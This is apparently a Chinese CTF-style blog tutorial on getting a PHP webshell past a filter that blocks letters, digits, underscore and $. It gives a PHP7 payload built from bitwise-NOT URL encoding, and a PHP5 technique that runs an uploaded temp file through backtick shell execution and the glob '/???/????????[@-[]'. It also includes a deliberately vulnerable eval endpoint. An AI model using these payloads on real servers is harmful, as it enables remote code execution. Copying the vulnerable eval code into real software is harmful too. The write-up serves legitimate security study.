目录

引言

如果是在php7

如果是在php5

现在我们来上传文件

最后的结果：

---

看本篇前可以先看这一篇：利用异或、取反、自增bypass_webshell_waf-CSDN博客

引言

上一篇介绍了如何构造出一个无字母数字的webshell，但是如果后端的代码变成了这样：

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

这里过滤了大小写字母、数字、_、$，因此我们上一篇介绍的利用$和_的方式都无法实现了，那么应该怎么构造webshell呢？

如果是在php7

php7中这个问题并不是很难解决，PHP7前是不允许用($a)();这样的方法来执行动态函数的，但PHP7中增加了对此的支持。

所以，我们可以通过('phpinfo')();来执行函数，第一个括号中可以是任意PHP表达式。

所以很简单了，构造一个可以生成phpinfo这个字符串的PHP表达式即可。

因为有大小写字母的限制，我们首先需要将phpinfo这个字符串转换为URL编码：

<?php
$a = "phpinfo";
echo urlencode(~$a);

 

那么就可以构造一个如此的payload了：

(~%8F%97%8F%96%91%99%90)();

如果是在php5

此时，如果我们尝试用PHP7的payload，将会得到一个错误：

原因就是php5并不支持这种表达方式。

那么这个问题现在呢应该怎么解决呢？

操作系统里包含的最重要的两个功能就是“shell（系统命令）”和“文件系统”，很多木马与远控其实也只实现了这两个功能。

PHP自然也能够和操作系统进行交互，“反引号”就是PHP中最简单的执行shell的方法。

那么，在使用PHP无法解决问题的情况下，为何不考虑用“反引号”+“shell”的方式来getshell呢？

因为反引号不属于“字母”、“数字”，所以我们可以执行系统命令，但问题来了：如何利用无字母、数字、$的系统命令来getshell？

好像问题又回到了原点：无字母、数字、$，在shell中仍然是一个难题。

此时还有两个有趣的Linux shell知识点需要理解：

1、shell下可以利用. 来执行任意脚本

它的作用和source一样，就是用当前的shell执行一个文件中的命令。

比如：当前运行的shell是bash，则. file的意思就是用bash执行file文件中的命令。

可以尝试编辑这样一个文件：

vim id.txt 

echo id

然后使用.来执行一下

. id.txt 
id

 可以看到确实是执行了

用. file执行文件，是不需要file有x权限的。

那么，如果目标服务器上有一个我们可控的文件，那不就可以利用.来执行它了吗？

这个文件也很好得到，我们可以发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。

2、Linux文件名支持用glob通配符代替

执行. /tmp/phpXXXXXX，也是有字母的。此时就可以用到Linux下的glob通配符：

• *可以代替0个及以上任意字符

• ?可以代表1个任意字符

那么，/tmp/phpXXXXXX就可以表示为/*/?????????或/???/?????????。

但我们尝试执行. /???/?????????，却得到如下错误：

这是因为，能够匹配上/???/?????????这个通配符的文件有很多，我们可以列出来：

先不看有这么多的文件，就在执行第一个匹配上的文件（即/bin/abrt-cli）的时候就已经出现了错误，导致整个流程停止，根本不会执行到我们上传的文件。

就跟正则表达式类似，glob支持利用[0-9]来表示一个范围。

我们再来看看之前列出可能干扰我们的文件,发现所有文件名都是小写，只有PHP生成的临时文件包含大写字母。

那么答案就呼之欲出了，我们只要找到一个可以表示“大写字母”的glob通配符，就能精准找到我们要执行的文件。

翻开ascii码表，可见大写字母位于@与[之间：

那么，我们可以利用[@-[]来表示大写字母：

. /???/????????[@-[]

现在我们来上传文件

web.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>

<body>
    <form action="web1.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file" id="">
        <input type="submit" value="submit">
    </form>
</body>

</html>

 

web.php

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

web1.php

这是是用来显示文件的上传信息的

<?php var_dump($_FILES);

注意，php生成临时文件名是随机的，最后一个字符不一定是大写字母，不过多尝试几次也就行了。

首先我们编写一个文件来用作测试：

现在我们可以尝试在上传文件后进行抓包：

web1.php包：

web.php包：

然后我们将web1.php包中post的值移动到web.php文件中，构造出一个上传文件

还有将Content-Type: multipart/form-data;增加到web.php包中

现在我们就可以在这里使用POST构造出临时文件，使用GET匹配临时文件

GE传入的T参数：

?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b

最后的结果：